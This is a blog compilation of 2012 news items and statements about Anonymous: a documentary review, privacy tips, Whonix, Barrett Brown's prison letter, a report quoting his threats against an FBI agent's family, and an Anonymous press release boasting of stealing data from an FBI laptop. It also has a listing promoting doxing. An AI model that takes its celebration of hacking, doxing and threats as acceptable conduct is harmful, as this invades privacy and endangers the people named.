Anonymous – Documentary “We Are Legion” Peels Back Hacktivist Group’s History

http://youtu.be/-_aWLu58Y1U

 

New documentary We Are Legion puts an actual human face on Anonymous, the hacktivist group whose members usually are seen wearing Guy Fawkes masks — if they are seen at all.

Considering Anonymous’ retaliatory acts against websites run by the Department of Justice and the entertainment industry just last week in response to the government takedown of file-sharing site Megaupload, We Are Legion: The Story of the Hacktivists could almost be mistaken for a 93-minute news segment.

But unlike most news segments about the group, the documentary contains genuine moments with actual Anons (some maintain their anonymity in the doc, but others don’t).

“The last two or three days we’ve seen a lot of what Anonymous does,” We Are Legion director Brian Knappenberger said in an interview with Wired.com here Saturday, the morning after the documentary’s premiere at the Slamdance Film Festival. “You know, there was a film about the Weather Underground that came out a few years ago, and that was made 30 years after they were blowing up buildings, and I love that film. But picture making a film like that while they were still blowing up buildings — that’s what I’m talking about.”

We Are Legion might be the first to portray the group’s members as true revolutionaries, and it could serve as a time capsule if the kind of online sit-ins and retaliatory strikes that Anonymous has helped create become the new model for civil disobedience across the globe.

For those who didn’t hear of Anonymous until Occupy Wall Street started up, We Are Legion effectively puts the group’s current incarnation in historical perspective. The documentary traces the roots of early hacker-activist groups like the Cult of the Dead Cow and Electronic Disturbance Theater before jumping into Anonymous’ roots in 4chan.

The documentary goes deep. Speaking with current and former Anonymous participants — as well as Wired writers Ryan Singel and Steven Levy — Knappenberger gives a thorough chronological account of Anonymous’ exploits, up to the group’s current place at the forefront of online disobedience.

Starting with Mercedes Renee Haefer, who was arrested in conjunction with the denial-of-service attacks against online payment service PayPal last July, the documentary talks to Anons and experts about Anonymous’ vendetta against Scientology, defense of WikiLeaks, and support of the actions in Tunisia and Egypt during the Arab Spring.

Slamdance, the underground alternative movie fest that runs during the Sundance Film Festival here each year, seems like the perfect place for We Are Legion’s primer on Anonymous. The film might have seemed out of place at a glitzy Hollywood-in-the-hills screening.

“It feels right,” Knappenberger said of the premiere. “Slamdance has a kind of undercurrent of revolutionary, counterculture, slightly anarchic vibe that just seemed to fit [the film] right away.”

Knappenberger is looking for distribution for his film so it can be seen by a wider audience. It seems possible that Hollywood backers will shy away from a film about Anonymous after the group’s actions against the Motion Picture Association of America and other entertainment industry power players. But Knappenberger said he isn’t worried.

“I just want to tell the story,” he said, adding that considering Anonymous’ various targets over the years, “Who aren’t I offending?”

He could also take advice from his subject Haefer, who in the film says that what Anonymous ultimately hopes to protect is freedom of speech, regardless of a person’s opinions or background.

Or, as she says simply, “Your opinion matters.”

via TellMeSpud

October 23, 2012 – DCMX Radio: Anonymous Part 1 – Quick History Timeline, Protection from FBI Manipulation, Anon Updates, Decrypting The Matrix

Timeline History of Anonymous Activism

Protect Yourself from FBI Manipulation (w/attorney Harvey Silverglate)

Outing of Amanda Todd Bullies!! DOX’d by Anonymous!

Anon Action Groups, PLF, Par:AnoIA, AnonOps

Decrypting the Matrix Statement


Every Week Night 12-1am EST (9-10pm PST)


iPhone Privacy: How To Stop Apple And Advertisers From Tracking You On iOS 6


Your iPhone, I’m sad to say, is not like Las Vegas: What happens there often does not stay there.

Much of your iPhone activity — including your web browsing, app store downloads and more — is transmitted to advertisers through various channels so that they can serve up relevant advertisements and offers for you. Although these services have mechanisms in place to ensure that you can’t be identified, you still might be a little uneasy about all of that information getting sent off to unclear dimensions (regardless of whether you’re doing anything — ahem — naughty on your iPhone).

Luckily for you and your privacy concerns, Apple has provided users with several ways, especially on iOS 6, to limit the amount of information that gets transmitted to third parties. Unluckily, they are buried deep within the bowels of the iPhone, opaquely worded, and not located where you might think they are.

Consider this, then, to be your privacy itinerary. Here are three settings you should tweak if you want to limit the activity tracking that occurs by default on your iPhone. While the settings won’t completely eliminate the transmission of your iPhone data to often-mysterious parties, they will greatly reduce it.

1. Limit Ad Tracking

The subject of a brief controversy stirred up by Business Insider, Apple recently changed the way it identifies your device, starting with iOS 6, for advertisers that serve you well-aimed ads. To which you might reasonably reply: “Wait a minute — Apple is identifying my device for advertisers so that they can serve me well-aimed ads?!?!”

Welcome to 2012, where pretty much everything with a battery is tracking you, and every site that prompts you to enter a login and password is trying to provide you with relevant ads.

Though Apple insists the Advertising Identifier is non-permanent and cannot be used to determine your identity — and by all indications, the new system is far better than the old one, which really did identify you to an odd extent — it still allows you to opt out of the program. To do so, go into Settings, then General, then About, then Advertising. You want to turn Limit Ad Tracking to the “On” position.

(Which is a little confusing, by the way: In order to turn ad tracking off, you have to flick the switch to “On”? How about, next time, if you want to shut something off, you select “Off”? If I want to mute my phone, I don’t have to switch “Turn Volume Off” to the “On” position, do I? Who’s on first?)

No matter: Turn “Limit Ad Tracking” on. You will still see ads on your phone, but they won’t be “targeted” to you based on your activity.

2. Opt Out Of Targeted iAds

To more thoroughly block targeted ads, you can specifically prevent Apple’s own iAd system from tracking your behavior and presenting ads based on that activity.

To do so, open Safari on your iPhone and visit http://oo.apple.com. There you’ll see a screen asking if you want to opt out of Interest Based iAds. If you flip the switch to “Off,” the ads you see will not be based on your history. Instead, they will be general, non-targeted advertisements. (See? Flip the switch to “Off” when you want to turn something off. How hard was that?)

And, as our friends at TUAW helpfully point out, this is not a final decision: If you find yourself yearning for targeted ads, you can bring them back any time you please, by clicking to the site above and turning them back on. Thomas Wolfe was wrong: You can go home again! (If by “home” you mean “digital advertisements conjured by an automated analysis of your smartphone activity.”)

While you’re tweaking your iAds, you might also shut off location-based iAds, or advertisements based on your current location. Go into Settings, then Privacy, then Location Services, then System Settings (at the bottom), then switch “Location-Based iAds” to the “Off” position.

3. Do Not Track

With the Safari browser in iOS 6, Apple also introduces a “Do Not Track” feature, which denies websites you visit the ability to track you both on their page and on other websites you visit when you leave.

I know, I know, it’s a radical concept: Once you leave a website, that website no longer tracks your behavior. It’s like, when I leave my friend’s apartment, do I expect him to secretly embed a spy camera on my backpack so that he can keep an eye on my every movement outside of his home?

Well, maybe. There’s no “Off” switch for my creepy friend William.

Unlike William’s creepiness, however, there is an “Off” switch for website tracking! To enable Do Not Track on your iPhone, you need to turn on “Private Browsing.” Open up Settings, and then go into the Settings for Safari. Switch Private Browsing to “On” and your phone will start sending a Do Not Track message to any website you visit.

You can learn more about the Do Not Track movement by visiting the official website (which will also tell you whether you have Do Not Track enabled on your browser).

These three tips should put your mind at ease about the extent to which your iPhone behavior is being tracked. Again, it’s not a wholesale solution to your iPhone-tracking concerns, but it will greatly reduce the more suspect, easily-preventable data-collecting activity.

Now, if you’ll excuse me, I have to go check my backpack for spy cameras.

via HuffPo

 

Whonix: The Anonymous Operating System


Whonix is an anonymous general-purpose operating system based on VirtualBox, Ubuntu GNU/Linux and Tor. By Whonix design, IP and DNS leaks are impossible. Not even malware with root rights can find out the user’s real IP/location.

Whonix consists of two machines, which are connected through an isolated network. One machine acts as the client or Whonix-Workstation, the other as a proxy or Whonix-Gateway, which will route all of the Whonix-Workstation’s traffic through Tor. This setup can be implemented either through virtualization and/or Physical Isolation.

Whonix advantages:

  • All applications, including those that do not support proxy settings, will automatically be routed through Tor.
  • Installation of any software package possible.
  • Safe hosting of Hidden services possible.
  • Protection against side channel attacks, no IP or DNS leaks possible. To test for leaks, see LeakTests.
  • Advantage over Live CDs: Tor’s data directory is still available after reboot, due to persistent storage. Tor requires persistent storage to save its Entry Guards.
  • Java / JavaScript / Flash / browser plugins / misconfigured applications cannot leak your real external IP.
  • Whonix even protects against root exploits (malware with root rights) on the Workstation.
  • Uses only Free Software.
  • Building Whonix from source is easy.
  • Tor+Vidalia and Tor Browser are not running inside the same machine. That means that, for example, an exploit in the browser can’t affect the integrity of the Tor process.
  • It is possible to use a Whonix setup in conjunction with VPNs, SSH and other proxies, placed first in the chain, last in the chain, or both. But see the Tor plus VPN/proxies Warning.
  • Loads of Optional Configurations (additional features / Add-Ons) available.
  • Best possible Protocol-Leak-Protection and Fingerprinting-Protection.

Can the Bitcoin Foundation Build Legitimacy For an Outlaw Currency?

Bitcoin may have just gotten an upgrade.

Bitcoin developer Gavin Andresen announced today on the Bitcoin Talk forums that he has launched a non-profit, modeled on the Linux Foundation, that will seek to “help people exchange resources and ideas [about Bitcoin] more freely.”

If you’re unfamiliar with the Linux Foundation, it’s a non-profit aimed at promoting the growth and advancement of Linux, an open-source operating system. David Perry, author of Coding in My Sleep, describes the foundation as:

A non-profit entity explicitly designed to help Linux succeed. It does this by acting as a neutral spokesperson, building networks of Linux users and developers, promoting the use of standards to make developers’ lives easier and so on. They also sponsor a number of key developers financially, turning what would otherwise be a hobby into an actual pays-the-bills job, thus allowing the developers to remain independent and work full time on improving Linux.

Mr. Andresen has similar hopes for the Bitcoin Foundation, which will help to standardize and fund Bitcoin infrastructure, keep the currency secure, and work to correct false interpretations and misinformation about Bitcoin. Bitcoin developers and aficionados can pay for membership status, which ranges from a 2.5 BTC annual membership (about $30, according to Preev) all the way up to 10,000 BTC/year (about $123,000, which, whoa).

“I think Linux is a great ‘role model’ for Bitcoin,” he wrote in the announcement. “It is a very successful open source project that really embraced the notion of ‘open,’ encouraging the use of the core technology for a wide range of applications. I hope that the Bitcoin Foundation will help do the same for Bitcoin.”

Of course, the Linux Foundation is about promoting an operating system that only accounts for 1.55% of the OS market share, whereas the Bitcoin Foundation will work to promote a cryptocurrency sometimes used for black-market activity. Bitcoin has seen its own share of PR nightmares in recent months, from an exchange-paralyzing heist to talk of Bitcoin Ponzi schemes. Perhaps the Bitcoin Foundation is just what the currency needs to clean up its image.

The Foundation itself even plainly states the need for an organization that can help break Bitcoin out of its cyberdungeon:

As the Bitcoin economy has evolved, we have all noticed barriers to its widespread adoption—botnets that attempt to undermine the network, hackers that threaten wallets, and an undeserved reputation stirred by ignorance and inaccurate reporting.

To us, it became clear that something had to be done. We see this foundation as critical for bringing legitimacy to the Bitcoin currency. Only then can we increase its adoption and positive impact on the world’s finance.

The Bitcoin Foundation has stacked its board with well-known, high-profile people active in the Bitcoin community so that users feel safe donating. Still, as Mr. Perry points out, “according to the dissenting voices, it’s representative only of the ‘big business’ side of Bitcoin, not the actual users.” Indeed, some users have expressed dissent on the boards, but for the most part they seem supportive of a unified effort to legitimize Bitcoin.

Plus, Mr. Andresen stresses that these decisions aren’t set in stone.

“The structure of the Foundation can be changed by a vote of its members,” he wrote, “and exactly what the Foundation does will largely depend on who is willing to step up and do the work to make things happen.”

via BetaBeat

Barrett Brown – Communiqué from Prison 9/20/12


It is hard for me to express how much I appreciate your letter, which is the first I have received here, along with the support I’ve reportedly gotten from others so far. Before I forget, let me request that you also send a tweet of support to Jenna, @ElviraXMontana on Twitter; as my girlfriend, she had to watch as the FBI crushed my ribs (which I believe will be healed in time even if I’ve had trouble acquiring medical attention due to me under Geneva; put in formal request for X-ray last night here at Mansfield, whereas last week at Lew Sterrett I was sent to medic by an officer Tamer before being instead re-directed to what is intended as a temporary holding cell for those about to be released on bond, this change of plan being instigated by an officer Roeun (sic?) whom I have since reported to the proper authorities. Despite my having explained her mistake politely twice over the course of the next seven hours, and despite my condition having been serious enough to have prompted other inmates to suggest I check for internal bleeding, I was screamed at and then later simply ordered to lay down, all of which was witnessed by two other inmates, one of whom promised to inform Tim Rogers of D Magazine that I was potentially dying and needed intervention ASAP as soon as he himself was released a few minutes hence (again, this was the temporary outgoing holding cell, not meant for housing inmates for anything longer than an hour or so as their bond is processed; as such, I was not fed, either, much less given my medication, suboxone. Note that none of the treatment I received at Lew Sterrett had anything to do with who I am or what I am accused of – it is simply the natural result of the inhumane and degenerate mentality found within the Texas “corrections” system, something I first described in a 2005 article for Towards Freedom.
It is something we will have to address more firmly over the coming years, just as we have addressed North Africa and the intelligence contracting industry since late 2010. And I note all of this not merely to complain—although to complain is among the few vices I have been left aside from bragging to my fellow inmates – but to illustrate the fundamental problem that so many of us have sacrificed or risked to combat. This problem, which even Richard Nixon recognized and spoke about on that famed evening at the Lincoln Memorial, is that a republic built with the blood of giants has since become a “wild animal.” – one that now feeds upon us all.
 
I try to avoid metaphors, which can illuminate but in practice are too often used to obscure. Like many aspects of language, the false metaphor kills and enslaves. And at any rate, there will be time to discuss these broader issues later. For now, I must ask you to publish this on pastebin, Anonpaste, piratepad.de, and all other available venues, and that you also send it to some of the journalists that have been kind enough to follow my work as well as the consequences thereof, particularly my friend Michael Hastings, Barry Eisler, Michael Riley (Bloomberg), Ryan Gallagher (Guardian), and Josh at Daily Caller (forgot his last name) – plus the former editor of The Yemen Times who’s now at Global Times or some such and who, along with a certain Washington Times correspondent known to Gregg Housh, plus one or two others that I know of, who are now looking into Romas/COIN due in part to my release of the NYT e-mails earlier this month. Along with others in both the mainstream and independent media, these are most likely to report accurately on this matter. Having been mischaracterized at least a hundred times by “professional” journalists since I first appeared on Fox News in January 2009 to denounce Obama’s association with the goofy fascist Rick Warren – and was introduced as being spokesman for the non-existent “American Atheist Society” rather than GAMPAC. This would be a good time to note, particularly for the benefit of certain journalists, that I am not and never have been the spokesman for Anonymous, nor its “public face” or, worse, “self-proclaimed” “face” or “spokesperson” or “leader” (as the CIA-funded Radio Free Europe called me last year when I felt compelled to “quit” the non-group that I’d never technically joined in the first place, but rather gradually attached myself to as Wikileaks and Tunisia went down in December of 2010). 
Anyone who cares to learn what happens to a person who decides to help deal with such issues at the request and with the knowledge of active Anons can search my name in conjunction with those terms, and then see the article “Barrett Brown is Anonymous” from April 2011 in which I explain clearly, as I have countless times since, that no one has the authority to designate me as such. It is known to some of those who worked out of Anonops or were otherwise particularly active in the beginning of 2011 that I wrote or edited a number of the press releases of that time, and that the al-Jazeera article written in the first few days of January and which appeared later that month under the title “Anonymous and the Global Correction” was also my work – something I revealed privately to the brilliant cyberpunk essayist Bruce Sterling after he openly speculated as to the author’s background in Wired, noting the sentiments to be that of a true revolutionary. Among those who now agree with him are the FBI, which has since responded accordingly – and unethically.
 
Contrary to the countless claims to the effect that I hold some official role in Anonymous, I can think of only one occasion in which any Anon has come close to actually deeming me as such, that being the day on which HBGary was hacked in retaliation for HBGary Federal CEO Aaron Barr’s claim – shown to be entirely false – that he had identified Anon’s “lieutenants” and “co-founder” and that he had been contacted by the FBI about this. In fact, he had conflated three different people including a professional gardener and, as shown in the notes Anon released along with the e-mails taken from HBGary Federal, had made a huge number of additional mistakes – something since confirmed by everyone concerned including Barr himself. (That the Financial Times writer who had bought Barr’s self-promotion would again essay to write about Anonymous months later, this time taking the claims of a Dutch kid at face value in the course of “reporting” various negative things about how the movement operates, is only one of numerous bizarre and depressing twists to this story; I myself would later encounter him on Canadian television as a panelist during a discussion in which he accused Anon of being particularly anti-“American interest”, to which I responded that it is difficult to avoid stepping on the empire’s toes when one assists North Africans in fighting off dictatorships that the US has supported for years.) (Oh snap!) On that day, as recorded on pastebin from the discussion on the #OPHBGary channel at Anonops, I was referred to in passing as “our public face” to a journalist.
I was on the phone to HBGary President Penny Hoglund at the time, apologizing that HBGary’s e-mails had been seized by Sabu in addition to HBGary Federal’s, instructing her on how to get on IRC in order to make her case directly to the hackers, and promising to remove the link I had put up to the 70,000 e-mails acquired in the operation, a link I had placed upon a Daily Kos post put up to explain the situation to the great many who would miss the “makeover” done to HBGary.com. Had I known that Penny was lying to me about what she and husband Greg Hoglund had known about Barr’s irresponsible attempt to save his own career at the expense of the innocent and heroic alike, I would have simply hung up. Instead, I was polite – but I recorded the call, just as I recorded the next call with Barr, the next call with HBGary exec Jim Butterworth, and finally the drunken call I received months later from Greg Hoglund himself. “Trust but verify,” as Reagan said in the context of a different set of villains.
 
With the exception of the ten minute convo I released between myself and Aaron Barr, all of the other recordings – and plenty of others – are in the possession of the FBI, which raided my apartment as well as my mother’s home on March 6th. For more on those events, as well as the criminal conspiracy to which I have been subjected by elements of the FBI, HBGary, and paid informant/contractor Jennifer Emick (among other parties both known and undiscovered), please see the last 3 videos I uploaded to my YouTube account, as well as documents I linked to on my Twitter account @BarrettBrownLOL in the final days before my most recent (and dramatic!) arrest. Not everything is released; I was interrupted by armed, mediocre federal agents and DPD officers (“No complicity in assassination of a chief executive since 1963!”) before I could finish making my case, which was to be done over several days before the entirety would be sent to the FBI and the judge who signed my March search warrant. This was to be followed by the instigation of a civil suit against HBGary and other parties to be named in the next 2 months. My plan has been disrupted – plans often are, as history tells us – but it has not been rendered obsolete. It will evolve, just as ProjectPM itself has evolved steadily since 2009, when this war became evident to me, when I first realized that my future as a political satirist would have to be abandoned in favor of this dirty, grueling struggle.
But why was I arrested this time? I would love to tell you. But the prosecution wouldn’t like that. I, and everyone else in the court room, were ordered to refrain from discussing the complaint, affidavits, and warrant, all of which are sealed at the request of the author, one FBI special agent whom I shall not name lest I give him cause for fright (or pretend fright – I am allegedly a danger to one especially skittish special agent whom I shall be careful not to name again until such time as I am prepared to list him in the civil suit I’ve been preparing for weeks now). Frankly, I do not blame this other special agent for requesting that the document be sealed – if I had written something of such low quality and demonstrable untruth, I would burn it and ask forgiveness of every deity invented by man and the higher apes/dolphins/whales. Likewise, if I were the US attorney who signed the Motion for Detention dated September 13 2012 – the document that, after having been approved by Judge Paul D. Stickney, ensured I would not only be prevented from discussing what I’m being accused of but also made a prisoner of the state until such time as a trial or some such can be concocted out of the jurisprudential magick I struggle to follow, in my innocence. Apparently I am not just a danger to the fragile FBI agents who have taken to threatening my mother and fracturing my ribs in the course of heavily-armed raids on my uptown Dallas apartment, but must be prevented from explaining to my associates, followers, and even enemies why I have again been subjected to violence and indignity.
 
I explained the first raid against me (March 6th, 6:30 a.m. CST) and the second against my mother (about six hours later) in several pastebin messages at that time. It was not until 2 months ago that I learned how a judge had been tricked into permitting this raid on me – how the disgraced contracting firm HBGary hired the paid FBI informant Jennifer Emick to, in their words, “find something to get [me] picked up on,” even as this bizarre former Anon made public accusations against me under both her real name and her adopted contractor persona: “FakeGreggHoush” on Twitter (now “AsherahResearch”) and Asherah on IRC – particularly the 2600 server where she frequented the #jester channel alongside various ex-military men and current “security” contractors who all found themselves inclined to associate with the admitted criminal hacker th3J35T3R, one of several parties who have taken credit for DoS attacks on Wikileaks. I should not have to remind anyone that 40 U.S. homes were raided in January 2011 due to a similar but less effective series of DDoS attacks on Visa, MasterCard, PayPal, and Amazon which were clearly an act of protest against an unprecedented economic blockade ordered by the U.S. regime. 14 of the “criminals” in question are being charged such that they face up to 15 years in prison. Thanks largely to Jay Leiderman the California attorney and John Penley the NYC activist and veteran, many of them are being represented for free. Likewise, I will seek and accept only pro bono assistance from this point on, though with the stipulation that I will pay any such lawyers what I can from the defense funds that have been set up for me thus far by well-wishers. As of this writing I dismiss Tom Mills, whom I retained for $3,500 after receiving bad advice from a well-meaning person.
I will also expect that money returned within 60 days of the publication of this missive online (ProjectPM participants, please ensure that he receives this message, which I have also delivered through my mother – whom he falsely claimed to be representing on the matter of the FBI threats against her despite having been paid by me, not her). And as I had noted both publicly and privately earlier this month, I am still seeking additional attorneys with skill in civil litigation to pursue at least two suits I’ll be filing by the end of the year. Those interested may write to me at my new home, Some Jail in Texas. I am able to arrange for phone conversations with any applicants (or anyone else who is either especially interesting or who is able to accept a collect call or contribute $5 to my commissary/phone fund, that being the cost of a 15-minute call instigated by me). Anyone who writes me without us having been formerly introduced, I will guarantee a response if you send self-addressed stamped envelope. Also I believe that only mail with a return address will be delivered to me, though I’m not sure.
 
I hate that I have spent so much time in conflict over the past two years, and that so much of this has involved my fellow American citizens rather than the Middle Eastern dictators that I got involved in this to combat. I feel sorrow at the lost opportunities, and as for the way it has changed me as a person… I like to think that I am wiser and less naïve than I was, but I know too well how foolish and unsophisticated I was to begin with. I cannot excuse the mistakes I myself have made on both the strategic and tactical levels in my short career. I shudder when I look back on some of the things I wrote or said when I got my first real taste of power at the dawn of 2011, and I continue to bring shame upon myself and upon my family and work by some of the things I say even lately. In particular I have made comments about the U.S. military that I do not mean and which are obviously not entirely accurate. Along with other nonsense I have said, felt, written throughout my life, many of these things originate from my own fears and weaknesses. I am humiliated at not being able to protect my own mother from the FBI, or to shield my own girlfriend from watching heavily-armed men step on my spine as I scream in pain. I cannot forget how my mom cried on March 6th after the FBI had left with my equipment and hers, and how she whispered through tears that she wanted to be able to protect me from prison but couldn’t; I will never forget the look on Jenna’s face as the federal thugs swept through my efficiency apartment with guns drawn and safeties off, in search of hidden assailants and non-existent weapons. That these things are unjust and increasingly insane does not change the fact that they are the result of my own behavior, my own miscalculations, my own choices.
 
Having said that, I regret nothing. For the last week I was denied opiates and thus forced to feel not just rage, hatred, all the primal things, but forced to endure them while sicker than most humans can imagine and in a jail that is overcrowded and filled with common criminals. I have gained something extraordinary in that process, which ended this morning when I was given the first of 30 days of suboxone. I will personally thank everyone on the outside who has helped me and this movement particularly at this critical time, when I have regained the freedom that I did nothing to lose. For now, and until that time, it is war, on paper as always, but war.
 
Barrett Brown
Founder
ProjectPM
Prisoner #35047177
Mansfield Law Enforcement Center
1601 Heritage Parkway
Mansfield, TX 76063
 
Postscript-
[redacted], if you are able to relay this message to the Anons, my ProjectPM people, journalists, etc, you will have done me a finer deed than most men ever have occasion to do for another. I am transmitting a copy of this to another individual to ensure that the FBI does not manage to silence me on this (incidentally, the local jail here in Mansfield has proven to be run by honorable, trustworthy, even friendly people, but it is nonetheless subject to the Yankee boot (no offense)). Tell journalists, etc that they may contact [redacted]. My future and that of ProjectPM depends on you and a handful of others. Thank you for your loyalty at this time. Finally, please include this PS when forwarding and ask people to see my original search warrant as published on Buzzfeed a few months back. Echelon2.org is part of the key to this affair, but not all. More to be revealed when all is prepared. Good luck to you.

Activist Barrett Brown Raided by FBI During Online Video Chat

http://youtu.be/eky-q9CE_co

For the second time this year, self-proclaimed Anonymous spokesman Barrett Brown was raided by the FBI.

The latest dramatic incident occurred late Wednesday evening while Brown and another woman identified by some as his girlfriend were participating in an online chat on TinyChat with other individuals.

Two minutes into the recorded chat session, loud voices could be heard in the background of Brown’s residence in Texas while the woman in the room with him was in front of the computer screen. She quickly closed the computer screen, but the audio continued to capture events in the room as the FBI appeared to strong-arm Brown to put handcuffs on him. Brown could be heard yelling in the background.

A spokeswoman in the Dallas County sheriff’s office confirmed to Wired that Brown was raided last night and was booked into the county jail around 11 p.m. She said the FBI removed him from the jail this morning to take him to a different facility, but she did not know where he was headed.

California attorney Jay Leiderman, a member of Brown’s legal team, told Wired that Brown was scheduled to be arraigned today in Texas on making threats to a federal agent.

Asked if the FBI agents were aware that Brown was online at the time of their raid, Leiderman said, “They probably would have preferred to raid him when he was not online.” He noted that the audio from the raid was “certainly less than flattering when they’re marching through these doors dropping F-bombs…. I imagine they would not want to have that captured if they could help it.”

A transcript of the TinyChat session has been posted online. Just moments before the arrest, there were jokes about whether one of the chat participants was real or just an animated GIF. Moments later, the chat participants faced a different conundrum: trying to figure out whether they’d just witnessed an FBI raid.

A voice that appeared to come from one of the arresting agents was heard saying something to the effect: “You’re going down! Get your hands down!”

Right as the noise began, another participant in the chat room showed up in a video window with a white handkerchief covering his lower face. “Is Barrett Brown getting fuckin’ raided by the FBI?” he appeared to say. “Holy shit!”

Brown’s latest raid came after he posted a long and rambling YouTube video in which he talked about taking drugs (though not today, he noted) and about retaliating against an FBI Agent named Robert Smith after he learned that his mother might be hit with obstruction of justice charges. The threat of charges was apparently related to a laptop of Brown’s that he apparently hid.

“So that’s why Robert Smith’s life is over,” Brown said in the video (beginning around minute 9:40). “When I say his life is over, I’m not saying I’m going to kill him, but I am going to ruin his life and look into his fucking kids. Because Aaron Barr did the same thing and he didn’t get raided for it. How do you like them apples?” he said, smiling.

The video, titled “Why I’m Going to Destroy FBI Agent Robert Smith Part Three: Revenge of the Lithe” was accompanied by a note apparently posted by Brown that reads: “Send all info on Agent Robert Smith to [email protected] so FBI can watch me look up his kids. It’s all legal, folks, Palantir chief counsel Matt Long already signed off on it when Themis planned worse.”

Brown also talked about being a target of the Zeta drug cartel and mentioned that he was heavily armed and was concerned that the cartel would come after him posed as federal officers.

“Any armed official of the U.S. government, particularly the FBI, will be regarded as potential Zeta assassin squads,” he said in the video. “As FBI knows … they know that I’m armed and I come from a military family and I was taught to shoot by a Vietnam veteran … and I will shoot all of them and kill them if they come and do anything…. I have reason to fear for my life.”

He signed off the video saying: “Frankly, it was pretty obvious I was going to be dead before I was 40 or so, so I wouldn’t mind going out with two FBI sidearms like a fucking Egyptian pharaoh. Adios.”

Asked about Brown’s comments, Leiderman said that he hadn’t seen the full video and wasn’t aware of everything Brown had said, but he noted that his client had a reputation for hyperbole and joking around, and that things he said might appear to be a threat when they weren’t really intended to be that way.

“It’s hard to understand the context [of what he said],” Leiderman said. “But this is speech, so ordinarily we go to a First Amendment defense, but obviously there are lines that can be crossed where you can lose your First Amendment protection.”

An FBI spokeswoman had no comment to make on Brown’s arrest.

 

 

SOURCE: Wired.com

Anonymous Press Release – The Recent Hack Of The FBI Cyber-Crime Division

Greetings World — On September 3, 2012 our comrades in AntiSec released a Press Release here –> http://pastebin.com/nfVT7b0Z

In this release they disclosed the fact that they had hacked the laptop of an FBI agent in the Cyber-Crime division and among the booty taken was a file containing 12 million UDIDs from various Apple products owned by people in the USA. They released evidence of this in the form of 1 million partially redacted entries from the file. The media did their usual idiot dance, latched onto the story and ran without thinking. Then mid-week it was pointed out by their critics that Anonymous could have got that file from many sources. Of course the FBI denied they were hacked, did you honestly think that the FBI Cyber-Crime guys would be like yeah Anonymous hacked us and we are butthurt? Please. Then no sooner does the media turn to this idea that hey, Anonymous could have got this info from some app developer lo and behold an app developer mysteriously discovers that they have been hacked and the data belongs to them. Yeah right. And now the media has come full circle like baying dogs and is reporting this shit as the newest version of reality. Fucking jokers. We have strong reason to believe this company Blue Toad are liars. But even if their data matches the data set obtained from the FBI by AntiSec, this simply points to one possible source where the FBI might have obtained the data. As AntiSec themselves pointed out in their response to the FBI’s lies, no one ever said the FBI got this data from Apple.

http://pastie.org/4678441

Now that the main stream media is finally catching on that this so-called “Blue Toad” revelation proves nothing, everyone seems completely perplexed. Some tech journalists are demanding hard “proof”. Don’t be fools, that would land a bunch of us in prison and it ain’t going to happen. What AntiSec and Anonymous HAVE provided you is evidence that only has meaning to the FBI Cyber-Crime guys.

These partial IPs for instance:

206.112.75.XX
153.31.184.XX

Has any reporter asked the FBI Cyber-Crime division if these IPs have any meaning to them? No, of course not. They would only deny it or just not answer the question saying it was a “security issue”, right? But it IS your job as a reporter to at least ask. In the initial Press Release, AntiSec provided the name of the Cyber Agent and the make and model of his laptop. “During the second week of March 2012, a Dell Vostro notebook, used by Supervisor Special Agent Christopher K. Stangl from FBI Regional Cyber Action Team and New York FBI Office Evidence Response Team was breached.” Has even ONE reporter contacted Agent Stangl and asked him what make and model laptop he uses for work? Uhmmm, no of course not. You are all so quick to believe some strange company who conveniently pops up out of the mists (and who we have never even heard of ourselves until today). But what is REALLY incredible is that you would believe a group who is historically PROVEN to be pathological liars and criminals, namely the FBI. AntiSec also provided the method used, and most security “experts” (i.e. White Hat Scum) have grudgingly admitted the hack would be possible using the technique described. AntiSec has even provided the MAC addresses of all the hardware used in the New York office of the Cyber-Crime Division:

http://twitter.yfrog.com/oboljfp

 

Has anyone asked the FBI if these MACS are real? And before you reply “they would just deny it or say no comment” – it is STILL your job as reporters to at least ASK and report their answer to your audience. You have asked for chat logs from the hack. AntiSec has indicated they may provide them after they have thoroughly scrutinized them and redacted shit that can get them V&ed, which will most likely include the forensic “proof” some of you crazy journos are clamoring for. But the bottom line is this. Anonymous and AntiSec have provided FAR more evidence for their side of the story than the FBI has with their two lousy tweets and then a steady stream of “no comments”. The FBI has not provided one shred of evidence for their lying denials. Anonymous and AntiSec have provided what they can, and may provide more in the future.

Here is the latest statement from AntiSec –> http://bit.ly/TQsCc3

 

AntiSec hacked the FBI and found 12 million UDIDs from Apple products on the laptop of a special cyber agent of the FBI. Whether the FBI had these for some tracking scenario as AntiSec opines, or whether they had them to use to crack open Apple stuff they seize when the “suspect” won’t give them the passwords – or whether they had them for some completely un-known nefarious reason, they had them and Anonymous took them. We know this is true, and more importantly the FBI knows this is true. It is not our job to convince either the media or the masses. But the truth is there, if the journalists want to actually WORK for a living and dig for it. Also, that file wasn’t all that AntiSec obtained from Agent Stangl’s laptop. The FBI and all you media journos should….

EXPECT US.

SINCERELY

— Anonymous Anonymous Global — www.AnonymousGlobal.tk

For Messages From AntiSec Follow @AnonymousIRC on Twitter

Cryptoparty Goes Viral: Pen testers, Privacy Geeks Spread Security to the Masses

Security professionals, geeks and hackers around the world are hosting a series of cryptography training sessions for the general public.

The ‘cryptoparty’ sessions were born in Australia and kicked off last week in Sydney and Canberra along with two in the US and Germany.

Information security experts and privacy advocates of all political stripes have organised the casual gatherings to teach users how to use cryptography and anonymity tools including Tor, PGP and Cryptocat.

Multiple sessions were proposed in Melbourne, Sydney, Adelaide, Canberra, Perth and two in Queensland. A further 10 were organised across Europe, Asia, Hawaii and North America, while dozens of requests were placed for sessions in other states and countries.

The cryptoparties were born from a Twitter discussion late last month between security researchers and a Sydney mum and privacy and online activist known by her handle, Asher Wolf.

For Wolf, the sessions were a way to reignite technical discussions on cryptography.

“A lot of us missed out on Cypherpunk (an electronic technical mailing list) in the nineties, and we hope to create a new entry pathway into cryptography,” Wolf said.

“The Berlin party was taught by hardcore hackers while Sydney had a diverse range of people attending. The idea is to teach people who don’t crypto how to use it.”

The concept resonated with the online security and privacy community.

It took only hours for about a dozen sessions to spring up around the world on a dedicated wiki page following what was only a casual Twitter exchange between Wolf and others — now cryptoparty organisers.

“When I woke up in the morning, they were all there,” Wolf said.

There was no formal uniformity between each cryptoparty. Some were hands-on, with users practising on laptops and tablets, while others were more theory-based with some organisers.

Each session runs for around five hours.

The free classes could accommodate a maximum of about 30 to 40 attendees. One of the first parties in the Southeastern US state of Tennessee had more than 100 people turn up to its afterparty, an event complete with music, beer and fire-twirling.

Copyright © SC Magazine, Australia

Anonymous Hackers Claim To Release One Million Apple Devices’ Unique Identifiers Stolen From FBI

